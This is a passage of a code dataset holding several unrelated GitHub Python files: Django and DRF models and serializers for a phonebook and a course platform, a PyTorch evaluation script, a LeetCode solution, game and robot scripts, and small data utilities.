model_utils import FieldTracker\nfrom django.conf import settings\n\nfrom base.models import PhoneBookBaseModel\n\n# Create your models here.\n\nclass Group(PhoneBookBaseModel):\n tracker = FieldTracker()\n name = models.CharField(\"Group Name\", max_length=100, null=False, blank=False)\n description = models.TextField(\"Description\", blank=True)\n head = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, related_name='head_of')\n authorized_users = models.ManyToManyField(settings.AUTH_USER_MODEL, null=False, related_name='privileges', help_text='Users who are allowed to send sms to the group.')\n\nclass PhoneBookContact(PhoneBookBaseModel):\n\n MEMBER_TYPE = (\n ('SD', 'Student'),\n ('FA', 'Faculty'),\n ('SF', 'Staff')\n )\n\n tracker = FieldTracker()\n name = models.CharField(\"Name\", max_length=100, null=False, blank=False)\n phone_number = models.CharField(\"Phone No.\", max_length=\"15\", null=False, blank=False)\n type = models.CharField(\"Contact Type\", max_length=10, choices=MEMBER_TYPE, null=False, blank=False)\n groups = models.ManyToManyField(Group, related_name='members', through='GroupMember')\n\nclass GroupMember(PhoneBookBaseModel):\n tracker = FieldTracker()\n group = models.ForeignKey(Group, null=False, blank=False)\n member = models.ForeignKey(PhoneBookContact, null=False, blank=False)\n","repo_name":"vamshedhar/smschannel-api","sub_path":"phonebook/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19829470882","text":"import torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader, random_split\nfrom torchvision import transforms\nfrom torch.optim.lr_scheduler import StepLR\nfrom PIL import Image\nfrom tqdm import tqdm\nimport matplotlib.pyplot as plt\nimport os\nimport glob\nimport wandb\nfrom model import *\nimport argparse\nimport random\nimport numpy as np\n\ntorch.manual_seed(1234)\nrandom.seed(1234)\nnp.random.seed(1234)\n\nparser = argparse.ArgumentParser(description=\"A script with argparse options\")\n\n# Add an argument for an integer option\nparser.add_argument(\"--runname\", type=str, required=False)\nparser.add_argument(\"--projectname\", type=str, required=False)\nparser.add_argument(\"--filepath\", type=str, required=False)\nparser.add_argument(\"--modelpath\", type=str, required=False)\nparser.add_argument(\"--modelname\", type=str, required=True)\nparser.add_argument(\"--batchsize\", type=int, default=4)\nparser.add_argument(\"--savingstep\", type=int, default=10)\nparser.add_argument(\"--epochs\", type=int, default=100)\nparser.add_argument(\"--nottest\", help=\"Enable verbose mode\", action=\"store_true\")\n\nargs = parser.parse_args()\n\narg_batch_size = args.batchsize\narg_epochs = args.epochs\narg_runname = args.runname\narg_projectname = args.projectname\narg_modelname = args.modelname\narg_savingstep = args.savingstep\n\nif args.nottest:\n arg_nottest = True \nelse:\n arg_nottest = False\n\nrun = wandb.init()\n\nartifact = run.use_artifact(args.filepath, type='model')\nartifact_dir = artifact.download()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nif arg_modelname == 'Unet':\n model = UNet(n_channels=18, n_classes=1).to(device) # Change n_classes based on your output\n \n\nprint(artifact_dir)\nmodel.load_state_dict(torch.load(artifact_dir+f'/{args.modelpath}'))\n\n\n\n# Create the dataset\nin_dir = '/root/home/rgb_data_128/'\ntar_dir = '/root/home/so_data_128/'\n\ndataset = RGBStreamOrderDataset(input_dir=in_dir, target_dir=tar_dir, transform=transform)\n\n\ntrain_size = int(0.8 * len(dataset))\ntest_size = len(dataset) - train_size\ntrain_dataset, test_dataset = random_split(dataset, [train_size, test_size])\n\ntrain_loader = DataLoader(train_dataset, batch_size=arg_batch_size, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=arg_batch_size, shuffle=True)\n\n\n\ndef evaluate_model(model, dataloader, criterion, threshold=0.5, nottest=True):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"------ Evaluation --------\")\n model.eval()\n total_loss = 0\n total_precision = 0\n total_recall = 0\n total_f1 = 0\n num_batches = len(dataloader)\n\n with torch.no_grad():\n for inputs, targets in tqdm(dataloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = model(inputs)\n\n # Apply sigmoid function to ensure outputs are in the probability space\n probs = outputs.sigmoid()\n preds = (probs > threshold).float() # Cast to float to perform calculations\n\n loss = criterion(outputs, targets)\n total_loss += loss.item()\n\n precision, recall, f1 = calculate_precision_recall_f1(preds, targets.float())\n total_precision += precision\n total_recall += recall\n total_f1 += f1\n\n if not nottest:\n break\n\n avg_loss = total_loss / num_batches\n avg_precision = total_precision / num_batches\n avg_recall = total_recall / num_batches\n avg_f1 = total_f1 / num_batches\n\n return avg_loss, avg_precision, avg_recall, avg_f1\n\n\n\n\n","repo_name":"SMATousi/Unet_rgb_to_so","sub_path":"run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16941513718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by HazzaCheng on 2019-09-12\n# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/\nfrom typing import List\n\nfrom src.main.python.leetcode_by_python.data_structure.TreeNode import TreeNode\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n node = None\n\n if preorder:\n node = TreeNode(preorder[0])\n target = inorder.index(preorder[0])\n node.left = self.buildTree(preorder[1:target + 1], inorder[:target])\n node.right = self.buildTree(preorder[target + 1:], inorder[target + 1:])\n\n return node\n","repo_name":"minhhahao/LeetCode","sub_path":"src/main/python/leetcode_by_python/tree/No105_Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_name":"No105_Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19776840969","text":"import pygame\r\n\r\n\r\nclass Navio(pygame.sprite.DirtySprite):\r\n def __init__(self, pos_x: int, pos_y: int, length: int, direcao: str, sq_size: int, *groups):\r\n super().__init__(*groups)\r\n self.length = length\r\n self.pos_x = pos_x\r\n self.pos_y = pos_y\r\n self.p1_points = 0\r\n self.p2_points = 0\r\n self.direction = direcao\r\n self.set_sprite()\r\n self.isRotated = False\r\n self.verify_direction()\r\n self.transform_sprite()\r\n self.rect = pygame.rect.Rect((self.pos_x * sq_size, self.pos_y * sq_size), self.image.get_size())\r\n self.sunken = False\r\n self.position_grid = []\r\n self.set_position_grid()\r\n self.visible = 0\r\n\r\n def set_sprite(self):\r\n if self.length == 1:\r\n self.image = pygame.image.load(\"images/Navio_1pc.png\")\r\n elif self.length == 2:\r\n self.image = pygame.image.load('images/Navio_2pc.png')\r\n elif self.length == 3:\r\n self.image = pygame.image.load('images/Navio_3pc.png')\r\n elif self.length == 4:\r\n self.image = pygame.image.load('images/Navio_4pc.png')\r\n else:\r\n self.image = pygame.image.load('images/Navio_5pc.png')\r\n\r\n def transform_sprite(self):\r\n if self.isRotated:\r\n self.image = pygame.transform.scale(self.image, (self.length * 50, 50))\r\n else:\r\n self.image = pygame.transform.scale(self.image, (50, self.length*50))\r\n\r\n def set_position_grid(self):\r\n \"\"\"\r\n Define a posição na grelha com base na sua posição inicial x,y e a sua orientação\r\n :return: Lista das posições ocupadas pelo navio\r\n \"\"\"\r\n j = 0\r\n if self.direction == \"horizontal\":\r\n for _ in range(self.length):\r\n self.position_grid.append((self.pos_x + j, self.pos_y))\r\n j += 1\r\n else:\r\n for _ in range(self.length):\r\n self.position_grid.append((self.pos_x, self.pos_y + j))\r\n j += 1\r\n\r\n return self.position_grid\r\n\r\n def verify_direction(self):\r\n if self.direction == \"horizontal\":\r\n self.image = pygame.transform.rotate(self.image, 270)\r\n self.isRotated = True\r\n\r\n def get_position_grid(self):\r\n return self.position_grid\r\n\r\n def set_sunken(self):\r\n self.sunken = True\r\n self.visible = 1\r\n\r\n def get_sunken(self):\r\n return self.sunken\r\n\r\n def get_p1_points(self):\r\n return self.p1_points\r\n\r\n def get_p2_points(self):\r\n return self.p2_points\r\n\r\n def add_p1_points(self):\r\n self.p1_points += 1\r\n\r\n def add_p2_points(self):\r\n self.p2_points += 1\r\n","repo_name":"Jarjarbinks-exe/BatalhaNavalSD","sub_path":"navios.py","file_name":"navios.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43999715265","text":"\"\"\"\nRead the BEA GDP data from a csv file.\n\nCaleb Braun\n5/9/19\n\"\"\"\nimport os\nimport pandas as pd\nfrom pkg_resources import resource_filename\n\n\ndef parse_gdp(gdp_file=None, syear=2006, eyear=2017):\n \"\"\"\n Collect non-seasonally adjusted GDP data.\n\n Source:\n Table 8.1.5. Gross Domestic Product, Not Seasonally Adjusted\n https://apps.bea.gov/iTable/index_nipa.cfm\n \"\"\"\n if gdp_file is None:\n gdp_file = resource_filename('eiafcst', os.path.join('data', 'raw_data', 'NQGDP_2002-2018_NSA.csv'))\n\n skip_rows = 4\n\n # Read, clean labels, and make (year, quarter) the row index\n gdp = pd.read_csv(gdp_file, header=[0, 1], skiprows=skip_rows, index_col=1).drop(columns=1)\n gdp.index = gdp.index.str.strip()\n gdp = gdp.transpose()\n\n # Build labels for GDP values from (year, quarter) index\n gdp_labeled = pd.DataFrame(gdp.index.tolist(), columns=['EconYear', 'quarter'], index=gdp.index)\n gdp_labeled.loc[:, 'gdp'] = gdp['Gross domestic product']\n gdp_labeled = gdp_labeled.reset_index(drop=True)\n\n gdp_labeled.loc[:, 'EconYear'] = gdp_labeled['EconYear'].astype('int')\n gdp_labeled.loc[:, 'quarter'] = gdp_labeled['quarter'].str[1].astype('int')\n\n gdp_labeled = gdp_labeled[(syear <= gdp_labeled['EconYear']) & (gdp_labeled['EconYear'] <= eyear)]\n\n return gdp_labeled\n\n\nif __name__ == '__main__':\n parse_gdp()\n","repo_name":"JGCRI/eiafcst","sub_path":"eiafcst/dataprep/economic.py","file_name":"economic.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15921764268","text":"# pylint: disable=duplicate-code\n\nimport numpy as np\nimport pytest\n\nfrom src.prediction.prepare_features import prepare_features\n\n\ndef test_prepare_features():\n correct_dict = {\n \"cap_shape\": \"x\",\n \"cap_surface\": \"s\",\n \"cap_color\": \"n\",\n \"bruises\": \"t\",\n \"odor\": \"a\",\n \"gill_attachment\": \"f\",\n \"gill_spacing\": \"c\",\n \"gill_size\": \"n\",\n \"gill_color\": \"b\",\n \"stalk_shape\": \"e\",\n \"stalk_root\": \"e\",\n \"stalk_surface_above_ring\": \"f\",\n \"stalk_surface_below_ring\": \"f\",\n \"stalk_color_above_ring\": \"b\",\n \"stalk_color_below_ring\": \"b\",\n \"veil_type\": \"p\",\n \"veil_color\": \"n\",\n \"ring_number\": \"n\",\n \"ring_type\": \"e\",\n \"spore_print_color\": \"k\",\n \"population\": \"a\",\n \"habitat\": \"g\",\n }\n\n wrong_dict = {\n \"cap_shape\": \"p\",\n \"cap_surface\": \"p\",\n \"cap_color\": \"p\",\n \"bruises\": \"p\",\n \"odor\": \"p\",\n \"gill_attachment\": \"p\",\n \"gill_spacing\": \"p\",\n \"gill_size\": \"p\",\n \"gill_color\": \"p\",\n \"stalk_shape\": \"p\",\n \"stalk_root\": \"p\",\n \"stalk_surface_above_ring\": \"p\",\n \"stalk_surface_below_ring\": \"p\",\n \"stalk_color_above_ring\": \"p\",\n \"stalk_color_below_ring\": \"p\",\n \"veil_type\": \"p\",\n \"veil_color\": \"p\",\n \"ring_number\": \"p\",\n \"ring_type\": \"p\",\n \"spore_print_color\": \"p\",\n \"population\": \"p\",\n \"habitat\": \"p\",\n }\n\n correct_features = prepare_features(correct_dict)\n\n assert isinstance(correct_features, np.ndarray)\n\n num_cat = np.array(\n [6, 4, 10, 2, 9, 2, 2, 2, 12, 2, 5, 4, 4, 9, 9, 1, 4, 3, 5, 9, 6, 7]\n )\n assert np.all(0 <= correct_features) and np.all(correct_features < num_cat)\n\n with pytest.raises(ValueError):\n prepare_features(wrong_dict)\n","repo_name":"Alvaro-Kothe/Mushroom-Classification","sub_path":"tests/test_prediction.py","file_name":"test_prediction.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74422201449","text":"#!/usr/bin/env python3\n\nfrom enum import Enum\n\n\nclass CellState(Enum):\n EMPTY = 0\n AI = 1\n ENEMY = 2\n\n @staticmethod\n def from_char(c):\n hmap = {\n \"0\": CellState.EMPTY,\n \"1\": CellState.AI,\n \"2\": CellState.ENEMY,\n }\n\n return hmap.get(c)\n\n @staticmethod\n def to_char(c):\n hmap = {\n CellState.EMPTY: \"0\",\n CellState.AI: \"1\",\n CellState.ENEMY: \"2\",\n }\n\n return hmap.get(c)\n\n @staticmethod\n def opposite_type(c):\n hmap = {\n CellState.EMPTY: CellState.EMPTY,\n CellState.ENEMY: CellState.AI,\n CellState.AI: CellState.ENEMY,\n }\n\n return hmap.get(c)\n","repo_name":"calvetalex/EPITECH","sub_path":"tek3/gomoku/CellState.py","file_name":"CellState.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16271163030","text":"import requests\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\npersonal_api_key = os.getenv(\"PERSONAL_API_KEY\")\nopen_ai_api_key = os.getenv(\"OPENAI_API_KEY\")\n\n\ndef get_token():\n payload = {\"apikey\": personal_api_key}\n response = requests.post('https://zadania.aidevs.pl/token/blogger', json=payload)\n return response.json().get('token')\n\n\ndef get_task():\n token = get_token()\n response = requests.get(f'https://zadania.aidevs.pl/task/{token}')\n return response.json()['blog'], token\n\ndef get_completion():\n topics, token = get_task()\n articles_list = []\n\n for topic in topics:\n content = f'Tworzysz artykuł na bloga na temat przyrzadzania pizyy Margherity. Napisz krotki artykul dla rozdzialu pod tytulem: {topic}. Odpowiedz tylko trescia artykulu (bez tytulu), niczym wiecej'\n data = {\"messages\": [{\"role\": \"user\", \"content\": content}], \"model\": \"gpt-3.5-turbo\"}\n headers = {\"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + open_ai_api_key}\n response = requests.post('https://api.openai.com/v1/chat/completions', json=data, headers=headers)\n parsed_response = response.json()['choices'][0]['message']['content']\n articles_list.append(parsed_response)\n return (articles_list, token)\n\n\ndef send_answer():\n articles_list, token = get_completion()\n payload = {\"answer\":articles_list}\n response = requests.post(f'https://zadania.aidevs.pl/answer/{token}', json=payload)\n return response.json()\n\n\nprint(send_answer())","repo_name":"bartoszc/AI_Devs","sub_path":"blogger.py","file_name":"blogger.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23216027488","text":"\"\"\"Teacher serializer.\"\"\"\r\n\r\n# Django\r\nfrom django.shortcuts import get_object_or_404\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\n\r\n# Django REST Framework\r\nfrom rest_framework import serializers\r\n\r\n# Models\r\nfrom api.users.models import (\r\n User,\r\n Subscription\r\n)\r\nfrom api.programs.models import (\r\n Course,\r\n CoursePrice,\r\n CourseLanguage,\r\n CourseBenefit,\r\n CourseBlockTrack,\r\n CourseBlock,\r\n CourseItemTrack,\r\n LectureContent,\r\n CourseUserData,\r\n LectureMaterial\r\n)\r\n\r\n# Serializes\r\nfrom .prices import CoursePriceModelSerializer\r\nfrom .languages import CourseLanguageModelSerializer\r\nfrom .benefits import CourseBenefitModelSerializer\r\n\r\n# Utils\r\nfrom datetime import timedelta\r\n\r\nfrom django.db.models import Sum\r\n\r\nclass CourseModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n items = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_price',\r\n 'course_language',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'published_in_program',\r\n 'offer_persentage',\r\n 'benefits',\r\n 'video_presentation',\r\n 'published',\r\n 'blocks',\r\n 'items',\r\n 'total_duration',\r\n 'color'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n def get_course_price(self, obj):\r\n # import pdb\r\n # pdb.set_trace()\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n def get_blocks(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_items(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\nclass CourseCreateSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def create(self, validated_data):\r\n\r\n user = self.context['request'].user\r\n validated_data['user'] = user\r\n validated_data['teacher'] = user.teacher\r\n\r\n program = self.context['program']\r\n validated_data['program'] = program\r\n\r\n return super().create(validated_data)\r\n\r\n\r\nclass CourseModifyModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_price',\r\n 'course_language',\r\n 'offer_persentage',\r\n 'picture',\r\n 'students',\r\n 'instructor',\r\n 'benefits',\r\n 'published',\r\n 'published_in_program',\r\n 'video_presentation',\r\n\r\n 'color',\r\n\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n def get_course_price(self, obj):\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data\r\n\r\n def update(self, instance, validated_data):\r\n # Actualizar el precio de la clase\r\n if 'price' in self.context and self.context['price'] != None:\r\n CoursePrice.objects.filter(course=instance).delete()\r\n CoursePrice.objects.create(\r\n **self.context['price'], course=instance)\r\n\r\n if 'language' in self.context and self.context['language'] != None:\r\n CourseLanguage.objects.filter(course=instance).delete()\r\n CourseLanguage.objects.create(\r\n **self.context['language'], course=instance)\r\n if 'benefits' in self.context and self.context['benefits'] != None:\r\n CourseBenefit.objects.filter(course=instance.pk).delete()\r\n for benefit in self.context['benefits']:\r\n CourseBenefit.objects.create(**benefit, course=instance)\r\n \r\n # Actualizar el tracks\r\n if 'tracks' in self.context and self.context['tracks'] != None:\r\n tracks = self.context['tracks']\r\n for track in tracks:\r\n track_object = get_object_or_404(CourseBlockTrack, id=track['id'])\r\n track_object.position = track['position']\r\n track_object.save()\r\n \r\n return super(CourseModifyModelSerializer, self).update(instance, validated_data)\r\n\r\n\r\nclass PublishCourseSerializer(serializers.Serializer):\r\n\r\n def validate(self, data):\r\n course = self.instance\r\n if not self.context['publish_in_program']:\r\n if not CoursePrice.objects.filter(course=course).exists():\r\n raise serializers.ValidationError(\r\n 'El curso no tiene un precio especificado')\r\n\r\n if not course.picture:\r\n raise serializers.ValidationError(\r\n 'El curso no tiene una imágen')\r\n # import pdb; pdb.set_trace()\r\n if not self.context['publish_in_program']:\r\n if not course.user.profile.stripe_account_id:\r\n raise serializers.ValidationError(\r\n 'Necesitas conectarte con stripe para poder recibir pagos')\r\n\r\n if len(course.title) == 0:\r\n raise serializers.ValidationError('Se requiere un titulo')\r\n\r\n return data\r\n\r\n def update(self, instance, validated_data):\r\n if self.context['publish_in_program']:\r\n instance.published_in_program = True\r\n\r\n else:\r\n instance.published = True\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass CancelPublishCourseSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n if self.context['publish_in_program']:\r\n instance.published_in_program = False\r\n\r\n else:\r\n instance.published = False\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass AddStudentCourseSerializer(serializers.Serializer):\r\n student = serializers.SerializerMethodField()\r\n\r\n def get_student(self, obj):\r\n from api.users.serializers.users import UserModelSerializer\r\n return UserModelSerializer(self.context['request'].user).data\r\n\r\n def validate(self, data):\r\n user = self.context['request'].user\r\n\r\n data = {\r\n 'user': user\r\n }\r\n return data\r\n\r\n def update(self, instance, validated_data):\r\n\r\n instance.students.add(validated_data['user'])\r\n\r\n instance.save()\r\n return instance\r\n\r\n \r\n\r\n\r\nclass CoursePlayingModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n blocks_count = serializers.SerializerMethodField(read_only=True)\r\n items_count = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n current_item_watching = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_language',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'published_in_program',\r\n 'video_presentation',\r\n 'published',\r\n 'offer_persentage',\r\n 'blocks',\r\n 'blocks_count',\r\n 'items_count',\r\n 'total_duration',\r\n 'color',\r\n 'current_item_watching'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_blocks(self, obj):\r\n from api.programs.serializers import CourseBlockTrackPlayingModelSerializer\r\n\r\n blocks = CourseBlockTrack.objects.filter(course=obj.id)\r\n request = self.context.get('request', None)\r\n \r\n if request and request.user and request.user.id:\r\n\r\n return CourseBlockTrackPlayingModelSerializer(blocks,user=request.user, many=True).data\r\n else:\r\n return CourseBlockTrackPlayingModelSerializer(blocks,user=None, many=True).data\r\n\r\n def get_items_count(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_blocks_count(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\n def get_current_item_watching(self, obj):\r\n from api.programs.serializers import CourseUserDataModelSerializer\r\n \r\n request = self.context.get('request', None)\r\n \r\n if request and request.user and request.user.id:\r\n\r\n course_user_data = CourseUserData.objects.filter(course=obj.id, user=self.context['request'].user)\r\n if len(course_user_data) > 0:\r\n return CourseUserDataModelSerializer(course_user_data[0], many=False).data['current_item_watching']\r\n else: \r\n return None\r\n else: \r\n return None\r\n\r\nclass CourseContentModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n course_language = serializers.SerializerMethodField(read_only=True)\r\n course_price = serializers.SerializerMethodField(read_only=True)\r\n students_count = serializers.SerializerMethodField(read_only=True)\r\n instructor = serializers.SerializerMethodField(read_only=True)\r\n blocks = serializers.SerializerMethodField(read_only=True)\r\n blocks_count = serializers.SerializerMethodField(read_only=True)\r\n items_count = serializers.SerializerMethodField(read_only=True)\r\n materials_count = serializers.SerializerMethodField(read_only=True)\r\n total_duration = serializers.SerializerMethodField(read_only=True)\r\n benefits = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = Course\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'title',\r\n 'subtitle',\r\n 'description',\r\n 'course_language',\r\n 'course_price',\r\n 'picture',\r\n 'students_count',\r\n 'students',\r\n 'instructor',\r\n 'offer_persentage',\r\n 'published_in_program',\r\n 'video_presentation',\r\n 'published',\r\n 'blocks',\r\n 'blocks_count',\r\n 'items_count',\r\n 'total_duration',\r\n 'color',\r\n 'materials_count',\r\n 'benefits',\r\n 'modified'\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n\r\n def get_students_count(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n students = obj.students.all().count()\r\n return students\r\n\r\n\r\n def get_course_language(self, obj):\r\n language = CourseLanguage.objects.filter(course=obj)\r\n if language.count() > 0:\r\n return CourseLanguageModelSerializer(language[0], many=False).data\r\n\r\n\r\n def get_course_price(self, obj):\r\n price = CoursePrice.objects.filter(course=obj)\r\n if price.count() > 0:\r\n return CoursePriceModelSerializer(price[0], many=False).data\r\n\r\n def get_instructor(self, obj):\r\n from api.users.serializers.users import UserTeacherCountModelSerializer\r\n return UserTeacherCountModelSerializer(obj.user, read_only=True).data\r\n\r\n def get_blocks(self, obj):\r\n from api.programs.serializers import CourseBlockTrackContentModelSerializer\r\n\r\n blocks = CourseBlockTrack.objects.filter(course=obj.id)\r\n return CourseBlockTrackContentModelSerializer(blocks, many=True).data\r\n\r\n def get_items_count(self, obj):\r\n items = CourseItemTrack.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n def get_blocks_count(self, obj):\r\n return obj.blocks.count()\r\n\r\n def get_materials_count(self, obj):\r\n items = LectureMaterial.objects.filter(course=obj.id).count()\r\n return items\r\n\r\n\r\n def get_total_duration(self, obj):\r\n return LectureContent.objects.filter(course=obj.id, type_choices=\"VI\").aggregate(Sum('duration'))['duration__sum']\r\n\r\n def get_benefits(self, obj):\r\n benefits = CourseBenefit.objects.filter(course=obj.id)\r\n return CourseBenefitModelSerializer(benefits, many=True).data","repo_name":"alexhernandez-git/django-classline","sub_path":"api/programs/serializers/courses/courses.py","file_name":"courses.py","file_ext":"py","file_size_in_byte":16633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37078829512","text":"import cozmo\nfrom cozmo.util import degrees, distance_mm\n\n# Define a constant for unit distance in millimeters\nUNIT_DISTANCE_MM = 100\n\n# Using a combination of vertical and horizontal movements.\n##########################################################>\n##########################################################> move_to_target_position()\ndef move_to_target_position(robot, start, end):\n distance_x = end[0] - start[0]\n distance_y = end[1] - start[1]\n robot.say_text(\"Now I will move vertically and horizontally\").wait_for_completed()\n while distance_x != 0 or distance_y != 0:\n if distance_y != 0:\n ##########################> Move vertically\n direction = 1 if distance_y > 0 else -1\n robot.drive_straight(distance_mm((UNIT_DISTANCE_MM * direction)), cozmo.util.speed_mmps(100)).wait_for_completed()\n distance_y = distance_y - direction\n\n if distance_x != 0:\n ##########################> Turn and move horizontally\n direction = -1 if distance_x > 0 else 1\n robot.turn_in_place((degrees(90 * 